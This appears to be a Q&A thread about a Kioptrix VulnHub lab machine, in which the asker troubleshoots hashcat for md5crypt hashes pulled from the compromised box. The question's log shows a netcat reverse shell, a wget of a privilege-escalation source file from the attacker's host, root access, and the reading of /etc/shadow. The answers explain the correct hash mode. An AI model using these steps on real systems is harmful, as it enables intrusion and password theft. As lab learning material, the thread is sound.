3

I've been trying Kioptrix: Level 1.1 (#2) and managed to get root access. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

wolf@linux:~$ nc -vklp 8080
listening on [any] 8080 ...
10.10.10.10: inverse host lookup failed: Unknown host
connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795

id
uid=48(apache) gid=48(apache) groups=48(apache)

cd /tmp
wget http://10.10.10.99/privesc.c
ls
privesc.c
gcc privesc.c -o privesc
./privesc

id
uid=0(root) gid=0(root) groups=48(apache)

cat /etc/passwd
cat /etc/shadow

unshadow file = md5.txt

wolf@linux:~$ cat md5.txt 
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
wolf@linux:~$

However, I'm having a problem sending the unshadow file md5.txt to hashcat.

Any idea what's wrong with this?

wolf@linux:~$ hashcat -m 0 -a 0 md5.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5.txt' on line 1 (root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 2 (john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 3 (harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 01:17:21 2020
Stopped: Mon May 25 01:17:21 2020
wolf@linux:~$

Update

I've also tried with md5 hash only instead of unshadow file, but still didn't work.

md5 hash only 

wolf@linux:~$ cat md5only.txt 
$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.
$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1
$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1
wolf@linux:~$

Still getting the same Line-length exception, (0.00%)...No hashes loaded error.

wolf@linux:~$ hashcat -m 0 -a 0 md5only.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5only.txt' on line 1 ($1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.): Line-length exception
Hashfile 'md5only.txt' on line 2 ($1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1): Line-length exception
Hashfile 'md5only.txt' on line 3 ($1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 03:10:03 2020
Stopped: Mon May 25 03:10:03 2020
wolf@linux:~$
Wolf
  • 347
  • 2
  • 3
  • 15
  • 1
    You need to put your hashes into the right format. The current format is MD5_crypt, meaning that it contains an identifier, a hash and a salt. You need to remove the identifier, split hash and salt and convert them into ASCII (meaning, hexadecimal for the hash and plaintext for the salt) –  May 24 '20 at 20:30

2 Answers2

4

What version of your hashcat?

kali@kali:$ hashcat --version
v5.1.0
kali@kali:$

There are a few types of md5 supported by hashcat

kali@kali:$ hashcat -h | grep md5
     10 | md5($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                            | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                      | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                      | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                  | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                       | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                      | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                 | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                 | Raw Hash, Salted and/or Iterated
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | HTTP, SMTP, LDAP Server
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
   6300 | AIX {smd5}                                       | Operating Systems
kali@kali:$

If you check your hash with hashid, you'll find out that this is actually MD5 Crypt

kali@kali:$ hashid '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
Analyzing '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
[+] MD5 Crypt 
[+] Cisco-IOS(MD5) 
[+] FreeBSD MD5 
kali@kali:$

There is only 1 md5crypt, and the code number is 500

kali@kali:$ hashcat -h | grep md5.*cry
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
kali@kali:$

Try again with correct hash mode which is 500 for this case

Try again ... voilà

kali@kali:~$ hashcat -m 500 -a 0 md5crypt.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=32 -D CUDA_ARCH=601 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
* Device #1: Kernel m00500.c2bb92e8.kernel not found in cache! Building may take a while...


* Device #1: Kernel amp_a0.e98c1de0.kernel not found in cache! Building may take a while...


Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 128                
- Device #1: autotuned kernel-loops to 250
2

Unlike John the Ripper, Hashcat does not understand the password file format; it requires just the hashes. So, for example, to crack root's password, only provide the following to Hashcat: $1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.

Edit: I neglected to see what options you were using. Those are not plain MD5 hashes; a regular hash would only be hexadecimal characters. Before running Hashcat, match up your hash to their table to determine the correct type. In this case, they look like md5crypt, so the correct option is -m 500.

multithr3at3d
  • 12,355
  • 3
  • 29
  • 42